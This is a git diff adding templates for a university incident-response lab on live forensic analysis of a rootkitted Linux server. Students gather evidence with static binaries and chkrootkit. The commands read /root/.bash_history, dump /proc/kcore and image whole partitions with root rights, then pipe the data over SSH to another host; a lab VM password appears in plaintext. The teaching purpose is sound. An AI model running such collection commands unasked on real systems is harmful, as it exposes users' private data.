+
+
+ <%= self.html_rendered %>
+
+
+
+
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb
new file mode 100644
index 000000000..c11478e8e
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb
@@ -0,0 +1,6 @@
+## License
+This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
+
+Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
+
+
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb
new file mode 100644
index 000000000..705728373
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb
@@ -0,0 +1,350 @@
+## Live analysis
+
+After suspecting a compromise, before powering down the server for offline analysis, the first step is typically to perform some initial investigation of the live system. Live analysis aims to investigate suspicions that a compromise has occurred, and gather volatile information, which may potentially include evidence that would be lost by powering down the computer.
+
+**On the desktop VM,** ==ssh into the compromised server==
+
+```bash
+ssh <%= $compromised_server_ip %>
+```
+
+> Because the same users exist on both systems, you can leave off the user name (normally ssh *username*@*server_ip*)
+
+**On the compromised_server VM (ssh):** To keep a record of what we are doing on the system, start the script command:
+
+```bash
+mkdir evid
+script -f evid/invst.log
+```
+> Note: *if you do this lab over multiple sessions*, be sure to save a copy of the log of your progress (evid/invst.log), and restart `script`.
+
+==LogBook question: Make a note of the risks and benefits associated with storing a record of what we are doing locally on the computer that we are investigating.==
+
+Consider the advantages of *handwritten* documentation of what investigators are doing.
+
+### Using a Live CD/DVD
+
+Many of the commands used to investigate what is happening on a system are standard Unix commands. However, it is advisable to run these from a read-only source, since software on your system may have been tampered with. Also, using read-only media minimises the changes made to your local filesystem, such as executable file access times.
+
+Next you will configure the compromised_server VM to have access to the FIRE (Forensic and Incident Response Environment) CD/DVD ISO (which is equivalent to inserting the optical disk into your server's DVD-tray). FIRE is an example of a Linux Live Disk that includes tools for forensic investigation. In addition to being able to boot to a version of Linux for offline investigation of evidence, the disk contains Linux tools for live analysis.
+
+Add the FIRE IR CD disk:
+
+In Hacktivity, click on the VM's settings (gear) icon and choose ==Change CD/DVD==.
+
+==Select the "fire-0.3.5b.iso"== file from the dropdown box. ==Click "Attach disk"==
+
+**Continuing on the compromised_server VM**, ==mount the disk==, so that we can access its contents:
+
+```bash
+sudo mount /media/cdrom0/ -o exec
+```
+
+On a typical system, many binary executables are dynamically linked; that is, these programs do not physically contain all the libraries (shared code) they use, and instead load that code from shared library files when the program runs. On Unix systems the shared code is typically contained in ".so" files, while on Windows ".dll" files contain shared code. The risk of using dynamically linked executables to investigate security breaches is that access times on the shared objects will be updated, and the shared code may also have been tampered with. For this reason it is safest to use programs that are statically linked; that is, compiled to physically contain a copy of all of the shared code they use.
+
+**On your Desktop VM (in a separate console tab)** ==look at which libraries are dynamically loaded== when you run a typical command:
+
+```bash
+ldd /bin/ls
+```
+
+Examine the output, and determine how many external libraries are involved.
+
+**On the compromised_server VM (ssh console)**: The FIRE disk contains a number of statically compiled programs to be used for investigations.
+
+==Look at the commands available:==
+
+```bash
+ls /media/cdrom0/statbins/linux2.2_x86/
+```
+
+==Check that these are indeed statically linked:==
+
+```bash
+ldd /media/cdrom0/statbins/linux2.2_x86/ls
+```
+
+==Compare the output to the previous command== run on your own Desktop system. The output will be distinctly different, reporting that the program is "not a dynamic executable".
+
+Note that, although an improvement, using statically linked programs such as these still does not guarantee that you can trust the output of the programs you run. ==Consider why, and make a note of this in your LogBook.==
+
+## First look around
+
+Run ls to view the contents of the home directory on the compromised_server.
+
+```bash
+cd
+ls
+```
+
+Run the static version:
+
+```bash
+/media/cdrom0/statbins/linux2.2_x86/ls
+```
+
+Note the presence of a "u_r_powned" file in the output from the live disk version of ls! The local version of ls is not accurately reporting the files that exist! Lucky we thought to run another copy of ls.
+
+## Collecting live state manually
+
+The next step is to use various tools to capture information about the live system, for later analysis. One approach to storing the resulting evidence is to send results over the network via Netcat or SSH, without storing them locally. Compared with storing the evidence you are collecting on the compromised machine itself, this has the advantage of not changing local files, and is less likely to tip off an attacker.
+
+**On your Desktop VM (not from the console still sshed into the server)**, ==create a directory for the evidence you are about to collect.==
+
+```bash
+mkdir evidence
+```
+
+### Saving output from the compromised server to your desktop
+
+**On the desktop VM (not from the sshed server)**, ==test sending the results of some commands over SSH to your Desktop VM==:
+
+```bash
+ssh <%= $compromised_server_ip %> "echo this command is running on the server"
+
+ssh <%= $compromised_server_ip %> "echo this command is running on the server" | tee evidence/test_output
+
+ls evidence
+
+cat evidence/test_output
+```
+
+> Take the time to make sure you understand which system each command above is running on.
+> tee prints to the screen as well as saving the output to disk (you can instead redirect the output to a file with `>`, but you won't see the output while the program runs).
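A tiny illustration of the difference (the file names here are throwaway examples):

```bash
# tee writes to the file AND passes the text through to the screen
echo "hello evidence" | tee /tmp/tee_demo.txt

# redirection with > writes to the file but prints nothing
echo "hello evidence" > /tmp/redir_demo.txt
cat /tmp/redir_demo.txt
```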
+
+### Comparing process lists
+
+Collect results of a process listing using ps over SSH to the compromised VM:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo ps aux" | tee evidence/local_ps_output
+```
+
+**On your Desktop VM**, find the newly created files and view the contents.
+
+> Hint: you may wish to use the Dolphin graphical file browser, then navigate to "/home/<%= $main_user %>/evidence".
+
+Run the statically compiled version of ls from the incident response disk to list the contents of /proc (this is provided dynamically by the kernel: a directory exists for every process on the system), and once again send the results to your Desktop VM...
+
+Run the command:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/ls /proc" | tee evidence/proc_ls_static
+```
+
+**On your Desktop VM**, find the newly created files and ==compare the list of pids (numbers representing processes) output from the previous commands==. Compare the second column of local\_ps\_output (the PID column from ps) with the numbers in proc\_ls\_static.
+
+Hint: you can do the comparison manually, or using commands such as "cut" (or [*awk*](http://lmgtfy.com/?q=use+awk+to+print+column)), "sort", and "diff". For example, `cat local_ps_output | awk '{ print $4 }'` will pipe the contents of the file local\_ps\_output into the awk command, which will split on spaces, and only display the fourth field. Ensure this is displaying the list of pids; if not, try selecting a different field. You could pipe this through to "sort". Then save that to a file (by appending " > pids\_ps\_out"). Remember "man awk", "man sort", and "man diff" will tell you about how to use the commands (and Google may also come in handy).
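As a rough sketch of the whole pipeline (run here against made-up sample files, so the file names and PIDs are hypothetical; substitute your real evidence files and check which field holds the PID):

```bash
# Tiny stand-ins for the real evidence files (hypothetical sample data)
printf 'root 1 0.0 init\nroot 2 0.0 sshd\n' > ps_demo
printf '1\n2\n666\n' > proc_demo

# Extract the PID column from the ps-style output, then sort both lists numerically
awk '{ print $2 }' ps_demo | sort -n > pids_ps_demo
sort -n proc_demo > pids_proc_demo

# diff exits non-zero when the files differ, so tolerate that here;
# a PID present in /proc but missing from ps is a red flag
diff pids_ps_demo pids_proc_demo || true
```

In this made-up data, PID 666 appears in the /proc listing but not in the ps output, which is exactly the kind of inconsistency you are looking for.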
+
+Are the same processes shown each time? If not, that is very suspicious, and likely indicates a break-in, and that we probably shouldn't trust the output of local commands. Can you explain why different tools are giving you a different picture of the system?
+
+> Note that some changes are to be expected simply due to timing, such as short-running processes, including the commands you are actually running to do your investigation. However, you wouldn't expect processes that are consistently running to be missing from the ps output.
+
+## Gathering live state using statically compiled programs
+
+Save a list of the files currently being accessed by programs:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/lsof" | tee evidence/lsof_out
+```
+
+Save a list of network connections:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo netstat -apn" | tee evidence/netstat_out
+
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/netstat -apn" | tee evidence/netstat_static_out
+```
+> (Some commands such as this one may take a while to run; wait until the Bash prompt returns)
+
+Save a list of the network resources currently being accessed by programs:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/lsof -P -i -n" | tee evidence/lsof_net_out
+```
+
+Save a copy of the routing table:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/route" | tee evidence/route_out
+```
+
+Save a copy of the ARP cache:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/arp -a" | tee evidence/arp_out
+```
+
+Save a list of the kernel modules currently loaded (as reported by the kernel):
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/cat /proc/modules" | tee evidence/lsmod_out
+```
+
+Save a copy of the Bash history:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/cat /root/.bash_history" | tee evidence/bash_history
+```
+
+**Creating images of the system state**
+
+We can take a snapshot of the live state of the computer by dumping the entire contents of memory (what is in RAM/swap) into a file. On a Linux system /proc/kcore contains an ELF-formatted core dump of the kernel. Save a snapshot of the kernel state:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/dd if=/proc/kcore conv=noerror,sync" | tee evidence/kcore
+```
+==After 10 seconds or so press Ctrl-C to stop.==
+
+Next, we can copy entire partitions to our other system, to preserve the exact state of stored data, and so that we can conduct offline analysis without modifying the filesystem.
+
+Start by identifying the device files for the partitions on the compromised system:
+
+```bash
+df
+```
+
+Note that on this system the root partition (mounted on "/"), is /dev/sda1.
+
+> Help: on some VMs, you may need to replace "sda1" with "hda1".
+
+Then **you could** (see the tip below) copy byte-for-byte the contents of the entire root ("/") partition over the network (where /dev/sda1 was identified from the previous command):
+
+```bash
+ssh -t <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/dd if=/dev/sda1 conv=noerror,sync" | tee evidence/sda1.img
+```
+> Tip: Feel free to ==skip this step==. Running this will take some time, so you may wish to continue with the next step while the copying runs.
+
+This command could be repeated for each partition including swap partitions. For now, let's accept that we have all we need.
+
+**On your Desktop VM**, list all the files you have created:
+
+```bash
+ls -la /home/<%= $main_user %>/evidence
+```
+
+At this stage ==take a closer look through== some of the information you have collected.
+
+==LogBook Task:== Examine the contents of the various output files and identify anything that may indicate that the computer has been compromised by an attacker. Hint: does the network usage seem suspicious?
+
+### Collecting live state using scripts
+
+As you may have concluded from the previous tasks, manually collecting all this information from a live system can be a fairly time-consuming process. Incident response data collection scripts can automate much of this process. A common data collection script, "linux-ir.sh", is included on the FIRE disk, and is also found on the popular Helix IR disk.
+
+**On the compromised_server VM (ssh console tab from earlier)**, have a look through the script:
+
+```bash
+less /media/cdrom0/statbins/linux-ir.sh
+```
+
+Note that this is a Bash script, and each line contains commands that you could type into the Bash shell. Bash provides the command prompt on most Unix systems, and a Bash script is an automated way of running commands. This script is quite simple, with a series of commands (similar to some of those you have already run) to display information about the running system.
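The overall shape of such a script is simply a sequence of labelled commands. Here is a minimal hypothetical sketch in that style (this is not the actual linux-ir.sh, and the file names are invented for the demo):

```bash
# Write a tiny IR-style collection script (hypothetical, illustrative only)
cat > /tmp/mini-ir.sh <<'EOF'
#!/bin/sh
echo "=== date ==="
date
echo "=== process list ==="
ps aux 2>/dev/null || echo "ps not available"
echo "=== network connections ==="
netstat -an 2>/dev/null || echo "netstat not available"
EOF
chmod +x /tmp/mini-ir.sh

# Run it, saving the labelled output much like the lab's ir_out file
/tmp/mini-ir.sh > /tmp/ir_demo_out
head -n 2 /tmp/ir_demo_out
```

Each `echo` prints a heading so that, when you later read the combined output file, you can tell which command produced which section.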
+
+Identify some commands within the script that collect information you have not already collected above.
+
+Exit viewing the script (press q).
+
+Run the data collection script, redirecting output to your Desktop VM:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "cd /media/cdrom0/statbins; sudo /media/cdrom0/statbins/linux-ir.sh" | tee evidence/ir_out
+```
+
+**On your Desktop VM**, have a look at the output from the script:
+
+```bash
+less /home/<%= $main_user %>/evidence/ir_out
+```
+
+Use what you have learnt to spot some evidence of a security compromise.
+
+### Checking for rootkits
+
+An important concern when investigating an incident is that the system (including user-space programs, libraries, and possibly even the OS kernel) may have been modified to hide the presence of changes made by an attacker. For example, the ps and ls commands may be modified, so that certain processes and files (respectively) are not displayed. The libraries used by various commands may have been modified, so that any programs using those libraries are provided with deceptive information. If the kernel has been modified, it can essentially change the behaviour of *any* program on the system, by changing the kernel's response to instructions from processes. For example, if a program attempts to *open* a file for viewing, the kernel could provide one set of content, while an attempt to *execute* the file may result in a completely different program running.
+
+Detecting the presence of rootkits is tricky, and prone to error. However, there are a number of techniques that, while not foolproof, can detect a number of rootkits. Methods of detection include: looking for inconsistencies between different ways of gathering data about the system state, and looking for known instances of malicious files.
+
+Chkrootkit is a Bash script that performs a number of tests for the presence of various rootkits.
+
+**On the compromised_server VM (ssh)**, have a quick look through the script; it is much more complex than the previous linux-ir.sh script:
+
+```bash
+less /media/cdrom0/statbins/chkrootkit-linux/chkrootkit
+```
+> Exit less
+
+Confirm that if we were to run ls, we would be running the local (dynamic) version, probably /bin/ls:
+
+```bash
+which ls
+```
+
+To understand why, look at the value of the environment variable \$PATH, which tells Bash where to look for programs:
+
+```bash
+echo $PATH
+```
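To see why the search order matters, here is a small sketch using a throwaway directory (/tmp/demo_bin, a made-up stand-in for the static binaries directory; `command -v` behaves like `which` here):

```bash
# Create a fake "static" ls in a throwaway directory
mkdir -p /tmp/demo_bin
printf '#!/bin/sh\necho this-is-the-demo-ls\n' > /tmp/demo_bin/ls
chmod +x /tmp/demo_bin/ls

# PATH is searched left to right, so prepending the directory wins the lookup
PATH=/tmp/demo_bin:$PATH command -v ls
```

This prints /tmp/demo_bin/ls rather than /bin/ls, because the prepended directory is searched first.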
+
+Set the \$PATH environment variable to use our static binaries wherever possible, so that when chkrootkit calls external programs it will (wherever possible) use the ones stored on the IR disk:
+
+```bash
+export static=/media/cdrom0/statbins/linux2.2_x86
+export PATH=$static:$PATH
+```
+
+Confirm that now if we were to run ls, we would be running the static version:
+
+```bash
+which ls
+```
+
+This should report the path to our static binary on the FIRE disk.
+
+It is now safe to run chkrootkit[^1]:
+
+```bash
+ssh <%= $compromised_server_ip %> "PATH=/media/cdrom0/statbins/linux2.2_x86:\$PATH sudo /media/cdrom0/statbins/chkrootkit-linux/chkrootkit" | tee evidence/chkrootkit_out
+```
+> Help: you may get a message in the terminal before you type the password. You should still type the password for the script to run. The script should not take long to run.
+
+**On your Desktop VM**, have a look at the output:
+
+```bash
+less /home/<%= $main_user %>/evidence/chkrootkit_out
+```
+
+From the output, identify files or directories reported as "INFECTED", or suspicious.
+
+At this stage you should be convinced that this system is compromised, and infected with some form of rootkit.
+
+**On the compromised_server VM (ssh console tab)**
+
+**You could** power down the compromised system, so that we can continue analysis offline:
+
+```bash
+/media/cdrom0/statbins/linux2.2_x86/sync; /media/cdrom0/statbins/linux2.2_x86/sync
+```
+> If you do not know what the sync command does, on your Desktop VM, run "info coreutils 'sync invocation'" for more information.
+>
+> At this point you could tell Hacktivity to force a Power Off. However, you might want to wait until you finish the Hackerbot challenges.
+
+Why might we want to force a power off (effectively "pulling the plug"), rather than going through the normal shutdown process (by running "halt" or "shutdown")?
+
+## Offline analysis of live data collection
+
+Note that even if the bash\_history was not saved, we can still recover commands that were run while the computer was running. This is possible by searching through the saved RAM (the kcore ELF dump we saved earlier).
+
+**On your Desktop VM**, run:
+
+```bash
+sudo -u <%= $main_user %> bash -c "strings -n 10 /home/<%= $main_user %>/evidence/kcore > /home/<%= $main_user %>/evidence/kcore_strings"
+```
+
+The above "strings" command extracts ASCII text from the binary core dump.
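You can see the effect on a small scale with a made-up binary file (the file name and embedded text below are invented for the demo):

```bash
# Mix short junk, unprintable bytes, and one long readable string
printf 'junk\000\001\002recovered_command_line_here\003end' > /tmp/demo_core

# Only printable runs of at least 10 characters survive the extraction
strings -n 10 /tmp/demo_core
```

The short fragments and binary bytes are discarded, leaving only the long readable run, which is why command lines left behind in RAM can be recovered this way.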
+
+Open the extracted strings, and look for evidence of the commands you ran before saving the kernel core dump:
+
+```bash
+less /home/<%= $main_user %>/evidence/kcore_strings
+```
+
+Now press the '/' key, and type a regex to search for commands you previously ran to collect information about the system. For example, try searching for "statbins/linux2.2_x86" (press 'n' for next).
+
+[^1]: Note that it would be better to not have to include \$PATH, and only use static versions. Unfortunately, FIRE does not include statically compiled versions of all of the commands that chkrootkit requires.
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md
new file mode 100644
index 000000000..d20dbd708
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md
@@ -0,0 +1,389 @@
+# Analysis of a Compromised System - Part 1: Online Analysis and Data Collection
+
+## Getting started
+### VMs in this lab
+
+==Start these VMs== (if you haven't already):
+
+- hackerbot_server (leave it running, you don't log into this)
+- desktop
+- compromised_server
+
+All of these VMs need to be running to complete the lab.
+
+
+To give the compromised VM access to the FIRE CD/DVD ISO: in the edit dialogue box ==select CD-ROM== as the Second Device.
+==Select the "fire-0.3.5b.iso"== file from the dropdown box.
+
+### Your login details for the "desktop" VM
+User: <%= $main_user %>
+Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
+
+
+### For marks in the module
+1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different from others' in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
+2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
+
+## Hackerbot!
+
+
+This exercise involves interacting with Hackerbot, a chatbot who will task you to investigate the system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
+
+Work through the below exercises, completing the Hackerbot challenges as noted.
+
+
+## Introduction
+
+So you have reason to believe one of your servers has experienced a security compromise... What next? For this lab you investigate a server that has been attacked and compromised.
+
+The investigation of a potential security compromise is closely related to digital forensics topics. As with forensic investigations, we also aim to maintain the integrity of our "evidence", *wherever possible* not modifying access times or other information. However, in a business incident response setting maintaining a chain of evidence may not be our highest priority, since we may be more concerned with other business objectives, such as assuring the confidentiality, integrity, and availability of data and services.
+
+During analysis, it is good practice to follow the order of volatility (OOV): collecting the most volatile evidence first (such as the contents of RAM, details of processes running, and so on) from a live system, then collecting less volatile evidence (such as data stored on disk) using offline analysis.
+
+## Live analysis
+
+After suspecting a compromise, before powering down the server for offline analysis, the first step is typically to perform some initial investigation of the live system. Live analysis aims to investigate suspicions that a compromise has occurred, and gather volatile information, which may potentially include evidence that would be lost by powering down the computer.
+
+
+==SSH into the compromised server:==
+
+
+
+**On the compromised VM (Redhat7.2):** To keep a record of what we are doing on the system, start the script command:
+
+```bash
+mkdir /tmp/evid
+script -f /tmp/evid/invst.log
+```
+> Note: *if you do this lab over multiple sessions*, be sure to save the log of your progress (/tmp/evid/invst.log), and restart `script`.
+
+==LogBook question: Make a note of the risks and benefits associated with storing a record of what we are doing locally on the computer that we are investigating.==
+
+Consider the advantages of *handwritten* documentation of what investigators are doing.
+
+Many of the commands used to investigate what is happening on a system are standard Unix commands. However, it is advisable to run these from a read-only source, since software on your system may have been tampered with. Also, using read-only media minimises the changes made to your local filesystem, such as executable file access times.
+
+During preparation, you configured the compromised VM to have access to the FIRE (Forensic and Incident Response Environment) CD/DVD ISO (which is equivalent to inserting the optical disk into your server's DVD-tray). FIRE is an example of a Linux Live Disk that includes tools for forensic investigation. In addition to being able to boot to a version of Linux for offline investigation of evidence, the disk contains Linux tools for live analysis.
+
+**On the compromised VM (Redhat7.2)**, ==mount the disk==, so that we can access its contents:
+
+```bash
+mount /dev/hdc /mnt/cdrom/
+```
+
+On a typical system, many binary executables are dynamically linked; that is, these programs do not physically contain all the libraries (shared code) they use, and instead load that code from shared library files when the program runs. On Unix systems the shared code is typically contained in ".so" files, while on Windows ".dll" files contain shared code. The risk of using dynamically linked executables to investigate security breaches is that access times on the shared objects will be updated, and the shared code may also have been tampered with. For this reason it is safest to use programs that are statically linked; that is, compiled to physically contain a copy of all of the shared code they use.
+
+**On your Desktop VM** ==look at which libraries are dynamically loaded== when you run a typical command:
+
+```bash
+ldd /bin/ls
+```
+
+Examine the output, and determine how many external libraries are involved.
+
+**On the compromised VM (Redhat7.2)**: The FIRE disk contains a number of statically compiled programs to be used for investigations. ==Check that these are indeed statically linked:==
+
+```bash
+ldd /mnt/cdrom/statbins/linux2.2_x86/ls
+```
+
+==Compare the output to the previous command== run on your own Desktop system. The output will be distinctly different, reporting that the program is "not a dynamic executable".
+
+Note that, although an improvement, using statically linked programs such as these still does not guarantee that you can trust the output of the programs you run. Consider why, and make a note of this.
+
+## Collecting live state manually
+
+The next step is to use tools to capture information about the live system, for later analysis. One approach to storing the resulting evidence is to send results over the network via Netcat or SSH, without storing them locally. Compared with storing the evidence on the compromised machine, this has the advantage of not changing local files, and is less likely to tip off an attacker.
+
+### Comparing process lists
+
+**On your Desktop VM**, ensure the local SSH server (sshd) is running on your system.
+
+**On the compromised VM (Redhat7.2)**, test sending the results of some commands (process lists using ps) over SSH to your Desktop VM:
+
+> Note: if the VM is not using a UK keyboard layout, the @ and " symbols may be reversed, and the | symbol is located at the \~. Alternatively, run `loadkeys uk` in the RedHat VM to swap to a UK keyboard layout.
+
+```bash
+ssh <%= $main_user %>@*desktop-IP-address* "mkdir evidence"
+
+ps aux | ssh <%= $main_user %>@*desktop-IP-address* "cat > evidence/ps_out"
+```
+
+> (Where *desktop-IP-address* is the IP address of your *desktop VM*, which should be on the same subnet as your compromised VM)
+
+==LogBook question: Why might it not be a good idea to ssh to your own account (if you had one on a Desktop in real life) and type your own password from the compromised system? What are some more secure alternatives?==
+
+**On your Desktop VM**, find the newly created files and view the contents.
+
+> Hint: you may wish to use the Dolphin graphical file browser, then navigate to "/home/<%= $main_user %>/evidence".
+
+**On the compromised VM (Redhat7.2)**, run the statically compiled version of ls from the incident response disk to list the contents of /proc (this is provided dynamically by the kernel: a directory exists for every process on the system), and once again send the results to your Desktop VM...
+
+First, to save yourself from having to type `/mnt/cdrom/statbins/linux2.2_x86/` over and over, save that value in a Bash variable:
+
+```bash
+export static="/mnt/cdrom/statbins/linux2.2_x86/"
+```
+
+Now, to run the statically compiled version of ls, you can run:
+
+```bash
+$static/ls
+```
+
+Run the command:
+
+```bash
+$static/ls /proc | ssh <%= $main_user %>@*desktop-IP-address* "cat > evidence/proc_ls_static"
+```
+
+**On your Desktop VM**, find the newly created files and compare the list of pids (numbers representing processes) output from the previous commands. Compare the second column of ps\_out (the PID column from ps) with the numbers in proc\_ls\_static.
+
+Hint: you can do the comparison manually, or using commands such as "cut" (or [*awk*](http://lmgtfy.com/?q=use+awk+to+print+column)), "sort", and "diff". For example, `cat ps_out | awk '{ print $4 }'` will pipe the contents of the file ps\_out into the awk command, which will split on spaces, and only display the fourth field. Ensure this is displaying the list of pids; if not, try selecting a different field. You could pipe this through to "sort". Then save that to a file (by appending " > pids\_ps\_out"). We have covered how to use diff previously. Remember "man awk", "man sort", and "man diff" will tell you about how to use the commands (and Google may also come in handy).
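As a small illustration of the `cut` approach mentioned above (the sample line below is made up; with real ps output, check which field holds the PID):

```bash
# Squeeze repeated spaces so cut's single-character delimiter lines up,
# then pull out the second field (the PID in ps-style output)
echo 'root    42  0.0  0.1  init' | tr -s ' ' | cut -d ' ' -f 2
```

This prints 42, the PID in the sample line; `tr -s` is needed because cut, unlike awk, does not treat runs of spaces as one delimiter.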
+
+Are the same processes shown each time? If not, that is very suspicious, and likely indicates a break-in, and that we probably shouldn't trust the output of local commands.
+
+### Gathering live state using statically compiled programs
+
+**On the compromised VM (Redhat7.2)**, save a copy of a list inodes of removed files that are still open or executing:
+
+```bash
+$static/ils -o /dev/hda1 | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/deleted_out"
+```
+> Tip: on VMware VMs, you may need to replace "hda1" with "sda1".
+
+Save a list of the files currently being accessed by programs:
+
+```bash
+$static/lsof | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsof_out"
+```
+
+**On your Desktop VM**, open evidence/lsof\_out.
+
+==LogBook question: Are any of these marked as "(deleted)"? How does this compare to the ils output? What does this indicate?==
+
+**On the compromised VM (Redhat7.2)**,
+
+Save a list of network connections:
+
+```bash
+$static/netstat -a | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/netstat_out"
+```
+> (Some commands such as this one may take a while to run; wait until the Bash prompt returns)
+
+Save a list of the network resources currently being accessed by programs:
+
+```bash
+$static/lsof -P -i -n | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsof_net_out"
+```
+
+Save a copy of the routing table:
+
+```bash
+$static/route | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/route_out"
+```
+
+Save a copy of the ARP cache:
+
+```bash
+$static/arp -a | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/arp_out"
+```
+
+Save a list of the kernel modules currently loaded (as reported by the kernel):
+
+```bash
+$static/cat /proc/modules | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsmod_out"
+```
+
+**Creating images of the system state**
+
+We can take a snapshot of the live state of the computer by dumping the entire contents of memory (what is in RAM/swap) into a file. On a Linux system /proc/kcore contains an ELF-formatted core dump of the kernel. Save a snapshot of the kernel state:
+
+```bash
+$static/dd if=/proc/kcore conv=noerror,sync | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/kcore"
+```
+
+Next, we can copy entire partitions to our other system, to preserve the exact state of stored data, and so that we can conduct offline analysis without modifying the filesystem.
+
+Start by identifying the device files for the partitions on the compromised system (Redhat7.2):
+
+```bash
+df
+```
+
+Note that on this system the root partition (mounted on "/"), is /dev/hda1.
+
+> Help: on VMware VMs only, you may need to replace "hda1" with "sda1".
+
+Then, copy byte-for-byte the contents of the root ("/") partition (where /dev/hda1 was identified from the previous command):
+
+```bash
+$static/dd if=/dev/hda1 conv=noerror,sync | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/hda1.img"
+```
+> Tip: Running this will take some time, so you may wish to continue with the next step while the copying runs.
+
+This command could be repeated for each partition, including swap partitions. For now, let's accept that we have all we need.
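
Imaging every partition by hand gets repetitive, so the command can be generated in a loop. A sketch that only *prints* the commands, so each one can be reviewed before running (the device names and `user@desktop` are placeholders, not values from this lab):

```shell
# Print one dd-over-ssh imaging command per partition name.
# hda1/hda2/hda5 and user@desktop are placeholders: substitute the
# devices that df reported and your own Desktop VM address.
for part in hda1 hda2 hda5; do
    printf '$static/dd if=/dev/%s conv=noerror,sync | ssh user@desktop "cat > evidence/%s.img"\n' "$part" "$part"
done
```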
+
+**On your Desktop VM**, list all the files you have created:
+
+```bash
+ls -la /home/<%= $main_user %>/evidence
+```
+
+At this stage look through some of the information you have collected. For example:
+
+```bash
+less /home/<%= $main_user %>/evidence/lsof_net_out
+```
+
+Examine the contents of the various output files and identify anything that may indicate that the computer has been compromised by an attacker. Hint: does the network usage seem suspicious?
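
Filtering for listening sockets is one quick triage step. The sketch below runs against an invented two-line sample (the processes and ports are made up; run the same awk against /home/<%= $main_user %>/evidence/lsof_net_out, adjusting the field number to match that file's columns):

```shell
# Invented sample in the rough shape of lsof -P -i -n output
cat > /tmp/lsof_sample <<'EOF'
sshd     412 root  3u  IPv4  TCP *:22 (LISTEN)
telnetd  666 root  4u  IPv4  TCP *:31337 (LISTEN)
EOF

# Keep only listening sockets; print process name and port so that
# unexpected high ports stand out at a glance.
awk '/LISTEN/ {split($7, a, ":"); print $1, a[2]}' /tmp/lsof_sample
```

This prints "sshd 22" and "telnetd 31337"; a telnet daemon listening on port 31337 would certainly count as suspicious.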
+
+### Collecting live state using scripts
+
+As you may have concluded from the previous tasks, manually collecting all this information from a live system can be a fairly time-consuming process. Incident response data collection scripts can automate much of this process. A common data collection script, "linux-ir.sh", is included on the FIRE disk, and is also found on the popular Helix IR disk.
+
+**On the compromised VM (Redhat7.2)**, have a look through the script:
+
+```bash
+less /mnt/cdrom/statbins/linux-ir.sh
+```
+
+Note that this is a Bash script, and each line contains commands that you could type into the Bash shell. Bash provides the command prompt on most Unix systems, and a Bash script is an automated way of running commands. This script is quite simple, with a series of commands (similar to some of those you have already run) to display information about the running system.
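
The structure of such a script can be sketched in a few lines. This is an illustration of the idea only, not an excerpt from linux-ir.sh, and the section names are invented:

```shell
#!/bin/bash
# Minimal sketch of an incident-response collection script: run each
# command under a banner, so the combined output stays readable.
collect() {
    echo "=== $1 ==="      # section banner
    shift
    "$@" 2>/dev/null       # run the command, discarding error noise
}

collect "system date"   date
collect "kernel"        uname -a
collect "current user"  id
```

Piping the whole script's output through ssh, as done below, then lands every section in a single evidence file on the Desktop VM.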
+
+Identify some commands within the script that collect information you have not already collected above.
+
+Exit viewing the script (press q).
+
+Run the data collection script, redirecting output to your Desktop VM:
+
+```bash
+cd /mnt/cdrom/statbins/
+
+./linux-ir.sh | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/ir_out"
+```
+
+**On your Desktop VM**, have a look at the output from the script:
+
+```bash
+less /home/<%= $main_user %>/evidence/ir_out
+```
+
+Use what you have learnt to spot some evidence of a security compromise.
+
